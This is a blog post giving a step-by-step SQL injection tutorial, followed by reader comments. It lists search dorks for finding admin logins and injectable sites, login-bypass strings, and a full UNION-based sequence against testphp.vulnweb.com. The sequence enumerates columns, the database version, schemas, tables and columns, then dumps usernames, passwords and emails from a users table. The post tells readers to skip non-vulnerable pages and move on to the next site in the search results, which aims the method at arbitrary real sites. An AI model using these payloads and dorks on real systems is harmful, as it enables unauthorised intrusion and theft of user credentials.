Subscribe by RSS RSS Icon
Follow me on Twitter Twitter Icon

Another SQL Injection Tutorial

These days when I'm doing penetration testing, I would normally use the automated SQL injection tools because it's much easier and faster. Even in my previous post also I only mentioned about these automated tools. However, I got this request from myHAC to write a step-by-step tutorial on SQL injection. Well I thought this could be a refresher for me and for other people to understand the underlying process behind the automated SQL injection tools. So here it goes.

What is SQL injection?
SQL(Structured Query Language) injection is an attack technique that exploits the vulnerability of the web application that communicates with the database of the server.This type of attack is successful if the application fails to validate the user supplied inputs in sql statements to communicate with the database there by allowing the attacker to gain control of all database resources.

Basic SQL Injection
The basic SQL injection attack is to bypass the login screen. Search for admin login page using the following dorks. (there are many more but i just want to keep this simple)

inurl:admin.asp
inurl:login.asp

Now that we have found the admin login page, we need to enter the following strings into the username and password text box. The commonly used SQL injection:

' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
and many more :)


Advanced SQL Injection
We need to find websites that are vulnerable to the attack. To do this we can use the following dorks:

inurl:index.php?catid=
inurl:index.php?id=
inurl:article.php?ID=
inurl:pageid=
inurl:page.php?file=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=

Step 1
Check whether the page is vulnerable to SQL injection or not. To do this just add a ' (apos) at the end of the URL.

http://testphp.vulnweb.com/listproducts.php?cat=1'


If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result.

Typical errors you'll get after appending the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():


Step 2
Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you.

Append an 'order by' statement to the URL.
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--

Continue increasing the number after order by till you get an error. So the highest number for which you do not get an error is the number of columns in the table. We got an error at 12 so the no of columns in the database is 11

http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 2--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 3--
----
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12--


Step 3
Now, we need to find vulnerable columns by using UNION function. Also precede the number after "id=" with a hyphen or minus (-). Say from the above step, you got that the table has 11 columns.

http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,11

Result of this query will be the column numbers that are accepting the queries, in this case 2 and 7. Now we'll inject our SQL statements in one of these columns.


Step 4
We'll use the mysql command @@version to get the version of the db. We have to inject the command in one of the open columns. We know column 2 and 7 are vulnerable. Say we use column number 7.

http://testphp.vulnweb.com/listproducts.php?cat=-1 union all select 1,2,3,4,5,6,@@version,8,9,10,11

You'll get the version of the database in the place  where you had got the number 7 in step 3.


Note: if you get version 4 then it will be a bit difficult because we have to guess the tables and columns.

Step 5
Now we try and get list of databases on the site.

http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,group_concat(schema_name),3,4,5,6,7,8,9,10,11 from information_schema.schemata--


To know the current database in use:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,concat(database()),3,4,5,6,7,8,9,10,11--


To get the current user:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,concat(user()),3,4,5,6,7,8,9,10,11--


To get the tables
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables where table_schema=database()--


http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11 from information_schema.tables where table_schema=database()--


To get the columns:
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 from information_schema.columns where table_schema=database()--


Get list of users
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,concat
(uname,0x3a,pass,0x3a,email,0x3a,name),8,9,10,11 from users


Note: 0x3a is the colon to separate the result.

4 comments:

HAW said...

adoi! susahnya nak faham.. panjang pulak tuh

dgodam said...

yg basic SQL injection tu pendek jer..advanced yg panjang berjela utk myHAC baca...huhuh

bizVM said...

thanks a lot bro. so useful info :)
http://bizvm.blogspot.com

Muhammad Azeem said...

This is a nice article..
Its very easy to understand ..
And this article is using to learn something about it..

c#, dot.net, php tutorial, Ms sql server

Thanks a lot..!

 
Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!

XHTML/CSS validations
Valid XHTML 1.0 Transitional Valid CSS!